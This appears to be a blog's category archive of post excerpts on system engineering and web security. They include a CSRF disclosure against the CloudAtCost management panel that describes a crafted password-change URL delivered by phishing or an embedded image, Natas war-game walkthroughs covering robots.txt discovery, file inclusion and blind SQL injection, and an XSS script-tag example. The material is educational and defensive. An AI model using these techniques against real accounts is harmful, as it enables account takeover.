News for the ‘System engineering’ Category

Book review: Site Reliability Engineering

Google has been working for about 2 years on a book about Site Reliability Engineering, the discipline and organization that keeps Google's large-scale systems running smoothly. "Site Reliability Engineering" was finally published last week. It spans some 500 pages, and offers a rare inside glimpse into how Google actually works. The authors are remarkably open, naming technologies and projects, and explaining how systems work. There may not be source code, but there's lots here that can be implemented outside Google. That makes it a great read for startups expecting to scale and small-to-medium tech companies that want to up their reliability game.


Diagnosing performance degradation under adverse circumstances

[This post is a few years old and was never published. Recently, I was reminded about memcached slab imbalance, which in turn reminded me of this post.]

At work, we encountered a sudden and precipitous performance regression on one particular page of a legacy application. It's a Perl web application, running under mod_perl, using ModPerl::RegistryLoader to compile scripts at server startup, and Apache::DBI to provide persistent database connections.

Our users suddenly began complaining about one particular page being "three times slower than normal." Later examination of the Apache logs showed a 20x(!!) slowdown.

Investigating this performance problem was interesting because we didn't have good access to required data, and our technology choices slowed us down or completely prevented us from collecting it. Although we solved the mystery, the experience had several important lessons.

CSRF vulnerability at provides low-cost virtual machines hosted in Canada. is the management interface, where customers can install OS images, access a console, etc.A system security breach indicator light. Photo by Jeff Keyzer (CC-BY-SA)

A cross-site request forgery vulnerability was discovered in this web application. If a customer could be tricked into visiting a crafted URL while logged in, an attacker could change the victim's password, gaining access to the management interface.

In turn, this grants root access on all the victim's VMs, the ability to wipe or reinstall VMs, and potentially allows the attacker to spend the victim's money on CloudAtCost products and services.

Changing the password does not end the session or email the user, so the victim will not immediately notice anything is wrong. Exploitation of CSRF is difficult to detect on the server, so CloudAtCost is unlikely to notice anything is wrong either.

There is no evidence the vulnerability is being exploited, but exploitation is trivial and the impact of exploitation is severe. Exploitation is simple: build a URL of the following form:$uri_encoded_password

Any method which gets the victim to load the crafted URL in their browser while logged in will cause their password to be changed, and the attacker can simply log in. Phishing emails are a common exploitation vector. A watering hole attack could also work: create a website that cloudatcost users would visit, or use one which already exists (such as and embed the crafted URL as an img resource, for example, and the attacker would achieve a similar effect. Other exploitation methods are certainly available, and practicable.


  • September 25, 2014: vulnerability discovered, and disclosed to CloudAtCost through a customer support ticket. Feedback is passed along, and the customer support ticket is closed.
  • September 25: vulnerability report is escalated via email. No reply.
  • October 2: vulnerability report is escalated via email, and a single point of contact at CloudAtCost is provided. Details are provided to that contact directly. No reply.
  • October 9: Direct contact is made with CloudAtCost and the Canadian Cyber Incident Response Centre (CCIRC), and full details are repeated. Follow-up is promised, but doesn't happen.
  • October 14: CCIRC reports that the vulnerability has been fixed. Testing shows that this is not the case. Clarification is requested from CloudAtCost. Deployment of the patch is scheduled for Nov 1.
  • November 3: The self-imposed date for deploying the patch (November 1) passes, and the application is still vulnerable. Clarification is requested from CloudAtCost. None is provided.
  • November 7: Information on the progress of deploying the patched application is requested. None is provided.
  • November 14: I spoke with a CloudAtCost representative on the phone, who said their team was having trouble getting a release out, and needed more time.
  • November 26: Information on the progress on deploying a fixed version of the web application was requested. No reply.
  • December 10: A hard deadline for public disclosure was set, and sent to CloudAtCost. The web application had been deployed in the past 3-4 days.
  • December 11: This disclosure is published.

Recovering from Heartbleed

Heartbleed is a critical vulnerability in OpenSSL revealed yesterday. I'm not sure it could be more serious: it allows an attacker to connect to your server and use the TLS heartbeat extension to obtain 64k of server memory (and do it again to get another 64k and again and...) -- while leaving no traces in logs. That server memory might include primary key material (private keys), secondary key material (usernames and passwords), and collateral (memory addresses, canaries used to detect overflow, etc)

Validating SSL certificates for IRC bouncers

IRC bouncers are sort of like a proxy. Your bouncer stays online, connected to IRC, all the time, and then you connect to the bouncer using a normal IRC client. I connect to my bouncer with an SSL-encrypted connection, but I hadn't been validating the certificate until now. Validating the SSL certificate is critical for thwarting man-in-the-middle (MITM) attacks.

In a MITM attack, the victim connects to the attacker, thinking it is the service they want to talk to (the IRC bouncer in this case). The attacker then forwards the connection to the service. Both connections might use SSL, but in the middle, the attacker can see the plaintext. They can simply eavesdrop, or modify the data flowing in both directions. SSL is supposed to prevent that, but if you don't validate the certificate, then you don't know who you're talking to. I want to know I'm really talking to my IRC bouncer, so let's figure out how to validate that certificate.

Presenting my Natas solutions at NSLUG

Last Monday, I presented my solutions to the Natas server-side security war games at my local linux users' group.

I recorded my talk, but it didn't turn out well. I was using Google Hangouts for the first time, and I forgot that it only records the windows you tell it to. In the video, embedded below the fold, there's a lot of talking about windows that were being projected, but which didn't get recorded. Still, the audio counts for something, and you can see what I'm talking about much of the time.

SSL configuration on nginx

This SSL configuration for nginx achieves an A on the SSL labs tool. It's what this server currently uses.

Server-side security war games: Part 15

We're nearly at the end! This is the 2nd-last level.

We know there is a users table, with columns "username" and "password". This time, the code just checks that the username exists. There's no way to print out the data we want. Instead, we'll have to do something cleverer.

Server-side security war games: Part 7

Level 7 is a simple webpage that doesn't seem to offer us any clues about a vulnerability. Let's click around those links a bit to see more.

Well, each of these links passes the name of the page to a PHP script, which seems to just stuff the contents of the file into the webpage. So, we should be able to change that URL parameter to whatever we want, in order to get the contents of the file containing the next password.

Server-side security war games: Part 6

On level 6, there is a curious "Input secret" form. I wonder what it does? Well, there is also a "View sourcecode" link, which will presumably show us the source code for that form. Then, we can try to anaylze whether it has any weaknesses we can take advantage of.

Server-side security war games: Part 3

There is still nothing on this page, and now if we look at the source, they've removed that image. Now there's a taunt that not even Google will find it this time.

Well, Google is a good little robot puppy who always obeys his master, but we are evil attackers. What rules do robots have to follow that we don't? robots.txt. Let's look at what they don't want Google to see. robots.txt always lives at the root of the domain, so open

They've hidden /s3cr3t/ from crawlers, but we don't have to abide by that. Let's take a look. Another directory listing, which contains a file which contains our password.

Lessons learned

Remember that hiding things from search engines is very different from making them inaccessible. Even some web crawlers won't respect your robots.txt file, and attackers certainly won't. If you need to make something inaccessible, configure that in your webserver, not in robots.txt.

See you soon for level 4!

Server-side security war games: Part 0 has a series of "war games" -- challenges that help you learn by doing. Natas is the webserver security series. Although there are walkthroughs already available, I am going to do my own series of posts. Some of the existing walkthroughs are overly complex, and none actually finished all the levels. The war games unfortunately don't have anything explaining why the example vulnerabilities can be important in real-world scenarios. I'll try to fill that void.

I'm going to post one every few days, beginning with levels zero and one today.

Planning a Content-Security-Policy with Dancer

The same-origin policy is a fundamental part of the security infrastructure of the web. It prevents a web site's scripts from accessing and interacting with scripts used on other sites. This helps keep your data safe because if your bank's website gives you some data, it can only be accessed by your bank's website, and not by scripts from other websites.

That's a nice theory, it'd be a shame if some evidence happened to it.

In the real world, attackers have found ways to get around the same-origin policy to gain access to data they're not supposed to be able to access. For example, a web programmer might mistakenly include some user-provided input verbatim in the HTML of a webpage -- perhaps a username. Well, if your username is <script type="text/javascript" src=""></script>, then how is the web browser supposed to know if that was intentionally put in the HTML of the page? Same-origin policies are insufficient in the face of programmer error. Enter Content Security Policy.

Wherein I realize the bliss of writing init scripts with Daemon::Control

Init scripts are annoying little things - almost entirely boilerplate. Here's how I learned to stop struggling, and love Daemon::Control to control my daemons.

The module really is as simple as the synopsis - you describe the daemon, have it write an init script (which actually just runs your Daemon::Control script) for you, then update-rc.d and you're golden. It really is that simple. (more…)